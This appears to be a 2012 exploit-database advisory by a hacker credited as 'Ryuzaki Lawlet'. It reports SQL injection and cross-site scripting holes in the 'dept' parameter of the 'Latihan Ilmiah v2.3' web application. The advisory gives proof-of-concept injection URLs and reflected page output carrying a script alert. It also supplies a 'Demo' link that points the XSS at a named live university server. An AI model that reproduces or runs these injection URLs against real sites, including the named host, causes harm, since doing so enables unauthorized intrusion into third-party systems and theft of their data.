##################################################
# Exploit Title: Latihan Ilmiah v2.3 Release <= SQLi /XSS Vulnerability
# Date: 07/10/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: -
# Tested on: Linux
+---------------------------------------------------+
[~]Exploit/p0c :

http://localhost/index.php?file=notice&dept=[SQLi]
http://localhost/index.php?file=notice&dept=[XSS]


<table width="100%" border="0" cellspacing="1" cellpadding="1">
  <tr>
    <td bgcolor="#3399FF" class="font_title2"><div align="center">Announcement: <script>alert(100)</script> </div></td>
  </tr>
  <tr class="font_content_s">
    <td><table width="100%" border="1" cellspacing="1" cellpadding="1" class="border1">
          <tr bgcolor="#FBE3B7" class="font_title border1" >
            <td width="17%"><div align="center">Date</div></td>
            <td width="83%"><div align="center">Subject</div></td>
          </tr>
          </table></td>

[~] Demo
http://ilmiah.fsktm.um.edu.my/index.php?file=notice&dept=[xss]

+---------------------------------------------------+
Greetz to : ./CyberSEC & Sofea Hana